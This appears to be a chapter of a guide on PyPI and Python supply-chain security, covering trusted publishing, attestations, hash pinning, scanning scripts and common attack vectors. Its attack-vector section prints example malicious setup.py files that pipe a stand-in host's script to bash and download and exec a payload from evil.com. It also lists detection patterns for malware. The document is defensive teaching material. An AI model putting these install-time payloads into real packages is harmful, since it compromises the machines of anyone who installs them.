PyPI/Python Ecosystem Security¶

SECURITY LEADER The Python Package Index (PyPI) has emerged as a leader in package ecosystem security, implementing innovative features like trusted publishing, attestations, and comprehensive security policies. These advances make PyPI a model for other package ecosystems to follow.

PyPI Ecosystem Overview¶

Scale and Characteristics¶

PyPI serves the Python community with impressive scale and security-focused features:

400,000+ packages with steady, quality-focused growth
~6 billion downloads per month across all packages
Trusted publishing with OIDC for secure package uploads
Digital attestations for package provenance verification
Strong security policies and incident response procedures

PyPI Security Evolution¶

PyPI has undergone significant security improvements over recent years:

timeline
    title PyPI Security Evolution

    2018 : Legacy PyPI retirement
         : Move to Warehouse (modern codebase)

    2019 : Two-factor authentication (TOTP)
         : Security key support (WebAuthn)
         : API token system
         : Improved audit logging

    2020 : Enhanced monitoring
         : Vulnerability reporting program

    2021 : Malware detection system
         : Improved package scanning
         : Security policies enforcement

    2022 : 2FA requirement for critical projects
         : Enhanced threat intelligence

    2023 : Trusted publishing (OIDC)
         : 2FA requirement announced for all accounts
         : Advanced security analytics

    2024 : Digital attestations (PEP 740)
         : Ecosystem-wide security improvements

Trusted Publishing: PyPI's Security Innovation¶

What is Trusted Publishing?¶

Trusted publishing uses OpenID Connect (OIDC) to establish cryptographic trust between PyPI and external systems like GitHub Actions, eliminating the need for long-lived API tokens.

sequenceDiagram
    participant GHA as GitHub Actions
    participant OIDC as GitHub OIDC Provider
    participant PyPI as PyPI
    participant Package as Package Registry

    Note over GHA,Package: Trusted Publishing Flow

    GHA->>OIDC: Request OIDC token for workflow
    OIDC->>GHA: Return signed JWT token
    GHA->>PyPI: Present OIDC token for authentication
    PyPI->>OIDC: Fetch provider's public signing keys
    OIDC->>PyPI: Return signing keys
    PyPI->>PyPI: Verify token signature and check claims against project configuration
    PyPI->>GHA: Issue short-lived upload token
    GHA->>Package: Upload package with short-lived token
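
The claim check in the flow above can be sketched in a few lines. This is a minimal illustration, not PyPI's implementation: `TrustedPublisher` and `claims_match` are hypothetical names, and the sketch assumes the token's signature and expiry have already been verified. The claim names (`iss`, `repository`, `job_workflow_ref`, `environment`) are the ones GitHub Actions places in its OIDC tokens.

```python
from dataclasses import dataclass
from typing import Optional

GITHUB_ISSUER = "https://token.actions.githubusercontent.com"


@dataclass(frozen=True)
class TrustedPublisher:
    """Hypothetical record of what a project owner registered on the index."""
    repository: str                    # "owner/repo"
    workflow_filename: str             # e.g. "publish.yml"
    environment: Optional[str] = None  # optional GitHub environment name


def claims_match(publisher: TrustedPublisher, claims: dict) -> bool:
    """Return True only if every registered field matches the token claims."""
    if claims.get("iss") != GITHUB_ISSUER:
        return False
    if claims.get("repository") != publisher.repository:
        return False
    # job_workflow_ref looks like "owner/repo/.github/workflows/file.yml@ref"
    expected_prefix = (
        f"{publisher.repository}/.github/workflows/{publisher.workflow_filename}@"
    )
    if not claims.get("job_workflow_ref", "").startswith(expected_prefix):
        return False
    # The environment is only enforced when the publisher registered one
    if publisher.environment is not None:
        return claims.get("environment") == publisher.environment
    return True
```

Because every field must match, a token minted for a fork or for a different workflow file in the same repository would be rejected.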

Benefits of Trusted Publishing¶

No Long-lived Secrets: Removes stored, long-lived API tokens from CI/CD environments
Cryptographic Trust: Uses public key cryptography for verification
Granular Permissions: Specific repository and workflow authorization
Audit Trail: Complete logging of publishing actions
Reduced Attack Surface: No long-lived credential to steal; the upload token expires within minutes

Setting Up Trusted Publishing¶

# .github/workflows/publish.yml
name: Publish to PyPI

on:
  release:
    types: [published]

jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # Required for OIDC token
      contents: read

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.x'

      - name: Install build dependencies
        run: python -m pip install build

      - name: Build package
        run: python -m build

      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        # No API token needed with trusted publishing!

PyPI Project Configuration:

# Configure trusted publishing on PyPI
1. Go to PyPI project management page
2. Add GitHub as trusted publisher
3. Specify: owner/repository, workflow filename, environment (optional)
4. No API token configuration needed

Digital Attestations and Provenance¶

Package Attestations¶

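PyPI supports digital attestations (standardized in PEP 740) that provide cryptographic proof of package origins. The statement below shows the general shape of an in-toto provenance statement; the statement and predicate versions PyPI actually stores may differ: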

{
  "_type": "https://in-toto.io/Statement/v0.1",
  "subject": [
    {
      "name": "my_package-1.0.0-py3-none-any.whl",
      "digest": {
        "sha256": "abcd1234..."
      }
    }
  ],
  "predicateType": "https://slsa.dev/provenance/v0.2",
  "predicate": {
    "builder": {
      "id": "https://github.com/actions/runner/github-hosted"
    },
    "buildType": "https://github.com/actions/workflow@v1",
    "invocation": {
      "configSource": {
        "uri": "git+https://github.com/owner/repo@refs/heads/main",
        "digest": {
          "sha1": "def5678..."
        }
      }
    },
    "metadata": {
      "buildInvocationId": "123456789",
      "buildStartedOn": "2023-01-01T00:00:00Z"
    }
  }
}
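
Provenance is only meaningful if the file in hand is the file the statement describes. The sketch below checks a downloaded artifact against the `subject` digest of a statement shaped like the one above. The function name `subject_matches` is hypothetical, and the sketch deliberately does not verify the signature over the statement, which a real verifier must do first.

```python
import hashlib


def subject_matches(statement: dict, filename: str, data: bytes) -> bool:
    """Check that `data` hashes to the sha256 recorded for `filename`."""
    actual = hashlib.sha256(data).hexdigest()
    for subject in statement.get("subject", []):
        if subject.get("name") == filename:
            return subject.get("digest", {}).get("sha256") == actual
    # No subject with that name: the statement says nothing about this file
    return False
```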

Verifying Attestations¶

# Install verification tools
pip install sigstore

# Verify a package against its Sigstore bundle
python -m sigstore verify identity \
  --cert-identity https://github.com/owner/repo/.github/workflows/publish.yml@refs/heads/main \
  --cert-oidc-issuer https://token.actions.githubusercontent.com \
  --bundle package.whl.sigstore.json \
  package.whl

PyPI Security Features¶

1. Multi-Factor Authentication¶

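PyPI introduced mandatory 2FA for maintainers of critical projects first and, since January 2024, requires it for every account that uploads or manages projects: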

# Enable 2FA on PyPI account
1. Visit PyPI account settings
2. Add authentication application (TOTP)
3. Add security keys (FIDO2/WebAuthn) - recommended
4. Download recovery codes

# Critical projects automatically require 2FA
# Affects ~4,000 projects covering ~90% of PyPI downloads

2. API Token Security¶

PyPI provides scoped API tokens with limited permissions:

# Create scoped API token
1. Generate the token under account settings
2. Scope it to a single project rather than the whole account
3. Use it in CI/CD with the username __token__ instead of a password
4. Revoke and regenerate it if it may have been exposed

# Token format provides metadata
pypi-AgEIcHlwaS5vcmcCJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMAACKlsxLCJwcm9qZWN0LXJlYWQiXQAABiAJYWJjZGVmZ2hpams...
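
The metadata is readable because the part after `pypi-` is base64. As a rough sketch, the function below decodes the first bytes of a token and returns the embedded location. It assumes the layout seen in the sample above (a version byte, a field-type byte, a length byte, then the location string). That layout is an observation about this sample, not a documented guarantee, and `token_location` is a hypothetical helper name. A check like this can help a secret scanner recognise leaked tokens. Never log a real token while doing so.

```python
import base64
from typing import Optional


def token_location(token: str) -> Optional[str]:
    """Return the location embedded at the start of a pypi- token, if any."""
    prefix = "pypi-"
    if not token.startswith(prefix):
        return None
    head = token[len(prefix):len(prefix) + 20]  # 20 base64 chars -> 15 bytes
    if len(head) < 20:
        return None
    try:
        raw = base64.urlsafe_b64decode(head)
    except ValueError:  # also covers binascii.Error
        return None
    # Assumed layout: version (2), field type (1 = location), length, value
    if len(raw) < 3 or raw[0] != 2 or raw[1] != 1:
        return None
    length = raw[2]
    if length > len(raw) - 3:
        return None
    return raw[3:3 + length].decode("ascii", errors="replace")
```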

3. Malware Detection¶

PyPI implements automated malware detection:

# Illustrative patterns that malware scanners commonly flag (not PyPI's actual rule set)
suspicious_patterns = [
    "eval(base64.b64decode(",     # Base64 encoded execution
    "exec(compile(",              # Dynamic compilation
    "__import__('os').system(",   # OS command execution
    "socket.socket(",             # Network connections
    "subprocess.Popen(",          # Process spawning
]

# PyPI scanning process
1. Automated scanning of all uploaded packages
2. Machine learning-based malware detection
3. Human review for suspicious packages
4. Rapid response for confirmed malware
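
Plain substring matching is noisy and easy to evade, so scanners often work on the parsed syntax tree instead. The following is a minimal sketch of that idea using the standard `ast` module. It is not PyPI's detection logic, and the `SUSPICIOUS_CALLS` set and function names are assumptions chosen for illustration.

```python
import ast

# Hypothetical watch list of call targets worth a closer look
SUSPICIOUS_CALLS = {
    "eval", "exec", "compile", "__import__",
    "os.system", "subprocess.Popen", "socket.socket",
}


def dotted_name(node):
    """Turn Name/Attribute chains such as os.system into 'os.system'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def find_suspicious_calls(source: str):
    """Return sorted (line, call_name) pairs for calls on the watch list."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)
```

Unlike a regex, this ignores matches inside comments and string literals, but it still cannot see through aliasing such as `s = os.system; s(...)`, so findings are leads for human review rather than verdicts.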

4. Package Integrity¶

PyPI ensures package integrity through multiple mechanisms:

# SHA256 hashes for all files
https://files.pythonhosted.org/packages/a1/b2/c3.../package-1.0.0.tar.gz
# Hash: sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890

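# Package verification (pip accepts --hash only inside a requirements file)
# requirements.txt:
#   package==1.0.0 --hash=sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890
pip install --require-hashes -r requirements.txt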

Python Package Installation Security¶

pip Installation Process¶

Understanding pip's installation process reveals security considerations:

# pip install security analysis
1. Resolve package dependencies from PyPI
2. Download package files (wheel or source)
3. Verify package integrity (SHA256) when hashes are pinned
4. Build source distributions into wheels (executes setup.py or the build backend)
5. Install package files

Security Implications¶

# setup.py can execute arbitrary code
from setuptools import setup
import os
import subprocess

# This code runs during installation!
os.system("curl -s malicious-site.com/script.sh | bash")

setup(
    name="malicious-package",
    version="1.0.0",
    # ... package configuration
)

Secure Installation Practices¶

# Use specific versions and hashes (hashes live in the requirements file)
pip install --require-hashes -r requirements.txt

# Install from wheels when possible (no setup.py execution)
pip install package --only-binary=:all:

# Use virtual environments for isolation
python -m venv myenv
source myenv/bin/activate
pip install package

# Check package before installation (wheel only, so nothing is built or executed)
pip download package --no-deps --only-binary=:all:
# Inspect contents before installing
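
Inspecting a downloaded file does not require unpacking it to disk. As a small sketch using only the standard library, the helpers below list the members of a wheel (a zip archive) or an sdist (a tarball) and report whether a `setup.py` is present. The function names are hypothetical.

```python
import tarfile
import zipfile


def list_distribution_files(path: str) -> list:
    """List member names of a wheel (.whl) or sdist (.tar.gz) without extracting."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as archive:
            return sorted(archive.namelist())
    if tarfile.is_tarfile(path):
        with tarfile.open(path) as archive:
            return sorted(archive.getnames())
    raise ValueError(f"not a zip or tar archive: {path}")


def has_setup_py(names: list) -> bool:
    """True if a setup.py sits at the archive root or one directory below it."""
    return any(
        name.count("/") <= 1 and name.rsplit("/", 1)[-1] == "setup.py"
        for name in names
    )
```

A missing `setup.py` is not proof of safety: building any sdist runs its build backend, and the installed modules run when imported.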

Common PyPI Attack Vectors¶

1. Typosquatting¶

Despite security measures, typosquatting remains a concern:

# Legitimate packages vs hypothetical lookalike names
requests    ->  request, requsts, reqeusts
numpy       ->  nympy, numpi, numpy-dev
django      ->  djago, django-admin, djangos
flask       ->  falsk, flaask, flasks
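
One common defence is to compare a requested name against a list of well-known packages before installing. The sketch below does this with a plain Levenshtein edit distance. The function names, the distance threshold of 2, and the choice of popular-package list are all assumptions for illustration.

```python
import re


def normalize(name: str) -> str:
    """Normalize a project name the way package indexes compare them."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance using a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def nearest_popular(name: str, popular: list, max_distance: int = 2):
    """Return the popular package `name` may be imitating, or None."""
    candidate = normalize(name)
    best = None
    for known in popular:
        target = normalize(known)
        if candidate == target:
            return None  # exact match: this is the real package
        distance = edit_distance(candidate, target)
        if distance <= max_distance and (best is None or distance < best[1]):
            best = (known, distance)
    return best[0] if best else None
```

Short names produce false positives (two unrelated five-letter names can easily be two edits apart), so a hit should prompt a second look, not an automatic block.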

2. Dependency Confusion¶

Exploiting package name resolution:

# Example attack scenario
# 1. Attacker identifies internal package name
# 2. Publishes package with same name and a higher version to PyPI
# 3. A build that searches both indexes (e.g. via --extra-index-url) installs the public version

# Protection: resolve only from the private package index
pip install package --index-url https://private-pypi.company.com/
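
The attack works because a resolver that consults several indexes treats them as equals and prefers the highest version. The toy model below illustrates that selection rule. It is a simplification under stated assumptions (purely numeric dotted versions, hypothetical function names), not pip's resolver.

```python
def parse_version(version: str) -> tuple:
    """Parse a purely numeric dotted version such as '1.2.0' (simplified)."""
    return tuple(int(part) for part in version.split("."))


def pick_candidate(candidates: list) -> tuple:
    """Pick the highest version, ignoring which index offered it."""
    return max(candidates, key=lambda item: parse_version(item[1]))


# (index name, version) pairs for the same project name
offers = [("private", "1.2.0"), ("public", "99.0.0")]
chosen = pick_candidate(offers)
```

Here `chosen` is the public candidate, which is why the protection above restricts resolution to a single trusted index instead of adding the private index alongside PyPI.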

3. Setup.py Exploitation¶

Malicious code in setup.py files:

# Example malicious setup.py
from setuptools import setup
import base64
import urllib.request

# Download and execute malicious payload
payload = urllib.request.urlopen('https://evil.com/payload.py').read()
exec(compile(base64.b64decode(payload), '<string>', 'exec'))

setup(name='innocent-package', version='1.0.0')

4. Package Takeover¶

Compromising existing packages:

Account compromise: Stealing maintainer credentials
Social engineering: Convincing maintainers to add attackers
Package abandonment: Taking over unmaintained packages
Transfer exploitation: Exploiting package ownership transfers

Advanced PyPI Security¶

1. Private Package Repositories¶

Setting up secure private PyPI repositories:

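# Using devpi for private PyPI
pip install devpi-server devpi-client

# Initialize and start devpi server (listens on localhost:3141 by default)
devpi-init
devpi-server

# Configure client (run in a second terminal)
devpi use http://localhost:3141
devpi user -c testuser   # prompts for a password; choose a strong one
devpi login testuser
devpi index -c dev
devpi use testuser/dev

# Upload private packages
devpi upload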

2. Package Verification Scripts¶

#!/usr/bin/env python3
"""
PyPI Package Security Verification Script
"""

import requests
import hashlib
import json
import zipfile
import ast
import re
from pathlib import Path

class PyPISecurityVerifier:
    def __init__(self):
        self.suspicious_patterns = [
            r'eval\s*\(',
            r'exec\s*\(',
            r'__import__\s*\(',
            r'subprocess\.',
            r'os\.system',
            r'socket\.socket',
            r'urllib\.request',
            r'base64\.b64decode',
        ]

    def check_package_metadata(self, package_name):
        """Check package metadata for suspicious indicators."""
        url = f"https://pypi.org/pypi/{package_name}/json"
        response = requests.get(url, timeout=10)

        if response.status_code != 200:
            return {"error": "Package not found"}

        data = response.json()
        info = data['info']

        # Security checks
        checks = {
            "package_age": self._check_package_age(data),
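            # maintainer_email may be None or empty; count only non-blank entries
            "maintainer_count": len([m for m in (info.get('maintainer_email') or '').split(',') if m.strip()]),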
            "download_stats": self._get_download_stats(package_name),
            "version_frequency": self._check_version_frequency(data),
            "has_source_distribution": self._has_source_distribution(data),
        }

        return checks

    def analyze_source_code(self, package_path):
        """Analyze package source code for suspicious patterns."""
        suspicious_files = []

        for py_file in Path(package_path).rglob("*.py"):
            with open(py_file, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read()

                # Check for suspicious patterns
                for pattern in self.suspicious_patterns:
                    if re.search(pattern, content):
                        suspicious_files.append({
                            "file": str(py_file),
                            "pattern": pattern,
                            "line": self._find_line_number(content, pattern)
                        })

        return suspicious_files

    def verify_package_integrity(self, package_name, version):
        """Verify package integrity using PyPI checksums."""
        url = f"https://pypi.org/pypi/{package_name}/{version}/json"
        response = requests.get(url, timeout=10)
        data = response.json()

        files = data['urls']
        verification_results = []

        for file_info in files:
            file_url = file_info['url']
            expected_hash = file_info['digests']['sha256']

            # Download and verify
            file_response = requests.get(file_url, timeout=30)
            actual_hash = hashlib.sha256(file_response.content).hexdigest()

            verification_results.append({
                "filename": file_info['filename'],
                "expected_hash": expected_hash,
                "actual_hash": actual_hash,
                "verified": expected_hash == actual_hash
            })

        return verification_results

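    def _check_package_age(self, data):
        """Days since the first file upload, or None if no files exist."""
        from datetime import datetime, timezone
        uploads = [
            f["upload_time_iso_8601"]
            for files in data.get("releases", {}).values()
            for f in files
        ]
        if not uploads:
            return None
        first = datetime.fromisoformat(min(uploads).replace("Z", "+00:00"))
        return (datetime.now(timezone.utc) - first).days

    def _get_download_stats(self, package_name):
        # PyPI's JSON API does not report download counts; plug in an
        # external statistics source here if one is available.
        return None

    def _check_version_frequency(self, data):
        """Number of published releases (a crude activity signal)."""
        return len(data.get("releases", {}))

    def _has_source_distribution(self, data):
        """True if the latest release ships an sdist."""
        return any(f.get("packagetype") == "sdist" for f in data.get("urls", []))

    def _find_line_number(self, content, pattern):
        """1-based line number of the first match, or None."""
        match = re.search(pattern, content)
        return content.count("\n", 0, match.start()) + 1 if match else None

# Usage example
if __name__ == "__main__":
    verifier = PyPISecurityVerifier()
    results = verifier.check_package_metadata("requests")
    print(json.dumps(results, indent=2))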

3. Dependency Pinning and Lock Files¶

# requirements.txt with hashes
requests==2.31.0 \
    --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1

# Using pip-tools for dependency management
pip install pip-tools

# Create requirements.in
echo "requests" > requirements.in

# Generate locked requirements with hashes
pip-compile --generate-hashes requirements.in

# Install with verification
pip-sync requirements.txt
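
A lock file only protects you if every entry is actually pinned and hashed. The sketch below is a small lint for a `requirements.txt` that reports entries lacking an exact `==` pin or a `--hash`. The function name `audit_requirements` is hypothetical, and the parsing is intentionally simple: it skips option lines and does not handle every requirement syntax pip accepts.

```python
import re


def audit_requirements(text: str) -> list:
    """Return (name, problem) pairs for entries that are not pinned and hashed."""
    # Join backslash-continued lines so each requirement is one logical line
    logical_lines = text.replace("\\\n", " ").splitlines()
    problems = []
    for raw in logical_lines:
        line = raw.strip()
        if not line or line.startswith(("#", "-")):
            continue  # blank line, comment, or option such as --index-url
        name = re.split(r"[\s=<>!~;\[]", line, maxsplit=1)[0]
        if not re.search(r"==[^\s=*]+(\s|$)", line):
            problems.append((name, "not pinned with =="))
        elif "--hash=" not in line:
            problems.append((name, "missing --hash"))
    return problems
```

Running a check like this in CI catches a hand-edited line that slipped past `pip-compile`.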

4. CI/CD Security for Python Projects¶

# Secure Python CI/CD pipeline
name: Python Security Pipeline

on: [push, pull_request]

jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install security tools
        run: |
          pip install safety bandit semgrep

      - name: Check for known vulnerabilities
        run: |
          # Check for vulnerable packages
          safety check

      - name: Static security analysis
        run: |
          # Security linting with bandit
          bandit -r src/

      - name: Semantic security analysis
        run: |
          # Advanced pattern matching
          semgrep --config=auto src/

      - name: Dependency analysis
        run: |
          # Generate an SBOM from the installed environment
          pip install cyclonedx-bom
          cyclonedx-py environment -o sbom.json

      - name: Upload SBOM
        uses: actions/upload-artifact@v4
        with:
          name: python-sbom
          path: sbom.json

PyPI vs Other Ecosystems¶

Security Feature Comparison¶

Feature	PyPI	npm	Maven Central	NuGet
Trusted Publishing	✅ Full OIDC support	❌ Not available	❌ Not available	❌ Not available
Digital Attestations	✅ Full support	🔶 Experimental	❌ Not available	❌ Not available
Mandatory 2FA	✅ Critical projects	🔶 High-impact packages	❌ Optional	❌ Optional
Malware Detection	✅ Automated + manual	🔶 Basic detection	🔶 Basic scanning	🔶 Basic scanning
Package Signing	✅ Built-in attestations	🔶 Experimental	✅ PGP signing	✅ Code signing

What Other Ecosystems Can Learn¶

Trusted Publishing Model: Eliminates long-lived secrets in CI/CD
Proactive Security Policies: Mandatory 2FA for critical projects
Comprehensive Attestations: Full provenance tracking
Community Engagement: Active security community involvement
Rapid Incident Response: Quick response to security issues

Developer Environment Protection¶

1. Virtual Environment Security¶

# Secure virtual environment practices
python -m venv --prompt="secure-project" venv
source venv/bin/activate

# Verify environment isolation
which python
which pip

# Install with verification
pip install --require-hashes -r requirements.txt

# Regular environment cleanup
deactivate
rm -rf venv
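
The `which python` check has a programmatic equivalent that scripts and CI jobs can assert on. In a virtual environment created by `venv`, `sys.prefix` points at the environment while `sys.base_prefix` points at the interpreter it was created from. The helper names below are hypothetical.

```python
import sys


def in_virtualenv() -> bool:
    """True when the running interpreter belongs to a venv-style environment."""
    return sys.prefix != sys.base_prefix


def environment_summary() -> dict:
    """Collect the paths that show which interpreter and environment are active."""
    return {
        "in_virtualenv": in_virtualenv(),
        "prefix": sys.prefix,
        "base_prefix": sys.base_prefix,
        "executable": sys.executable,
    }
```

An install script could refuse to continue when `in_virtualenv()` is false, which prevents accidental installs into the system interpreter.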

2. Package Installation Monitoring¶

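# Monitor package imports at runtime
import builtins
from functools import wraps

# Hypothetical blocklist; replace with names relevant to your organization
SUSPICIOUS_PACKAGES = {"requsts", "nympy", "djago"}

def is_suspicious_package(package_name):
    """Return True if the top-level package name is on the blocklist."""
    return package_name.split(".")[0] in SUSPICIOUS_PACKAGES

def monitor_imports(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        if args and isinstance(args[0], str):
            package_name = args[0]
            print(f"🔍 Importing package: {package_name}")

            # Check for suspicious packages
            if is_suspicious_package(package_name):
                print(f"⚠️ Warning: Suspicious package detected: {package_name}")

        return func(*args, **kwargs)
    return wrapper

# Patch import mechanism (use the builtins module; __builtins__ may be a dict)
original_import = builtins.__import__
builtins.__import__ = monitor_imports(original_import)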

3. Sandboxed Development¶

# Using containers for Python development
# Dockerfile.python-dev
FROM python:3.11-slim

# Create non-root user
RUN useradd -m -u 1000 developer

# Install security tools
RUN pip install safety bandit

# Set up workspace
WORKDIR /workspace
RUN chown developer:developer /workspace

# Switch to non-root user
USER developer

# Entry point
CMD ["bash"]

Incident Response: PyPI Security Breaches¶

Historical Incidents¶

2019 - jeIlyfish Package: Typosquat of jellyfish that stole SSH and GPG keys
2020 - Python Package Backdoor: Banking trojan distribution
2021 - Dependency Confusion: Major companies affected
2022 - Crypto Package Attacks: Multiple malicious packages

PyPI's Response Improvements¶

Automated Detection: Machine learning-based malware detection
Rapid Response: Sub-hour response times for confirmed threats
Community Reporting: Easy reporting mechanisms for users
Transparency: Public incident reports and lessons learned

Lessons for Organizations¶

# PyPI Incident Response Lessons

## Prevention
- Implement trusted publishing where possible
- Use package verification and attestations
- Maintain comprehensive package inventories
- Regular security training for developers

## Detection
- Monitor package installations and updates
- Implement SBOM tracking and analysis
- Use automated vulnerability scanning
- Establish baseline behavior patterns

## Response
- Have pre-planned incident response procedures
- Maintain communication channels with package maintainers
- Implement rapid rollback capabilities
- Document lessons learned for future improvement
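
The inventory and baseline items above can be prototyped with the standard library alone. As a minimal sketch, the code below snapshots the installed distributions with `importlib.metadata` and diffs the snapshot against a stored baseline. The function names and the shape of the returned dictionary are assumptions for illustration.

```python
from importlib import metadata


def installed_packages() -> dict:
    """Map lower-cased distribution name to version for the current environment."""
    packages = {}
    for dist in metadata.distributions():
        name = dist.metadata.get("Name")
        if name:  # skip distributions with broken metadata
            packages[name.lower()] = dist.version
    return packages


def diff_inventory(baseline: dict, current: dict) -> dict:
    """Report what was added, removed, or changed relative to the baseline."""
    return {
        "added": {n: v for n, v in current.items() if n not in baseline},
        "removed": {n: v for n, v in baseline.items() if n not in current},
        "changed": {
            n: (baseline[n], v)
            for n, v in current.items()
            if n in baseline and baseline[n] != v
        },
    }
```

Storing the snapshot as JSON after each approved deployment gives a baseline. An unexpected entry under `added` or `changed` is then a concrete trigger for the response steps listed above.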

Future of PyPI Security¶

Ongoing Initiatives¶

SLSA Framework Integration: Enhanced supply chain security standards
Sigstore Adoption: Keyless signing for all packages
Machine Learning Enhancement: Improved threat detection
Cross-Ecosystem Collaboration: Sharing security innovations

Recommended Practices¶

Adopt Trusted Publishing: Eliminate long-lived tokens
Verify Attestations: Check package provenance
Use Security Tools: Integrate safety, bandit, and others
Stay Informed: Follow PyPI security announcements
Contribute Back: Report issues and improve ecosystem security

Conclusion¶

PyPI has emerged as a security leader in the package ecosystem space, demonstrating how proactive security measures can significantly improve ecosystem security. Key innovations include:

Trusted Publishing: Eliminating long-lived secrets
Digital Attestations: Cryptographic provenance verification
Proactive Policies: Mandatory 2FA for critical projects
Community Engagement: Active security community involvement

BEST PRACTICE Organizations should look to PyPI's security model as a template for secure package management. The trusted publishing and attestation features represent the future direction for package ecosystem security.

The next section covers Maven/Java Ecosystem Security, which has its own unique security characteristics and challenges.